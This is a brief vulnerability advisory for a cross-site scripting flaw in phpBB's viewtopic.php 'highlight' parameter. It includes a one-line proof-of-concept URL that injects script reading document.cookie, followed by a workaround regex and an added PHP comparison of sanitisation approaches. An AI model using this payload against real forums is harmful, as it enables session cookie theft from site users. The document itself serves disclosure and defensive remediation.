phpBB is a popular PHP bulletin board system. A vulnerability in viewtopic.php allows remote attackers to insert malicious JavaScript code.

Credit:
The information has been provided by Arab VieruZ.
Exploit:
http://phpbb/phpBB/viewtopic.php?t=17071&highlight=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>
Possible workaround:
Open viewtopic.php and add this code:
// Encode HTML metacharacters, then strip letters and the listed punctuation.
$highlight = htmlspecialchars($highlight);
$highlight = preg_replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $highlight);
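
The workaround above also removes every letter from the parameter ([A-Z] with the /i flag), so legitimate search terms are no longer highlighted. The PHP below is an added example, not phpBB code and not part of the original advisory: it runs the workaround beside an allowlist variant that keeps letters and digits and encodes at output. The function names, and the assumption that the value is written into HTML and into link URLs, are hypothetical.

```php
<?php
// Added example, not phpBB code. Function names are hypothetical.

// The advisory's workaround, wrapped so its output can be inspected.
function page_workaround(string $highlight): string
{
    $highlight = htmlspecialchars($highlight);
    return preg_replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $highlight);
}

// Allowlist variant: keep letters, digits and spaces so highlighting
// still works; everything else becomes a word separator.
function clean_highlight(string $raw, int $maxWords = 8): array
{
    $kept = preg_replace('/[^\p{L}\p{N} ]+/u', ' ', $raw);
    if ($kept === null) {        // invalid UTF-8 makes /u patterns fail
        return [];
    }
    $words = preg_split('/ +/', $kept, -1, PREG_SPLIT_NO_EMPTY);
    return array_slice($words, 0, $maxWords);
}

// Encode for the context the value is written into (assumed: HTML text or
// attribute, and a query-string value in a link).
function highlight_for_html(array $words): string
{
    return htmlspecialchars(implode(' ', $words), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function highlight_for_url(array $words): string
{
    return rawurlencode(implode(' ', $words));
}

// Constructed sample inputs: a normal search and a markup-breaking value.
$samples = ['install guide', '"><b>x</b>'];
foreach ($samples as $raw) {
    $words = clean_highlight($raw);
    printf("input:      %s\n", $raw);
    printf("workaround: [%s]\n", page_workaround($raw));
    printf("allowlist:  [%s]\n", highlight_for_html($words));
    printf("url value:  [%s]\n\n", highlight_for_url($words));
}
```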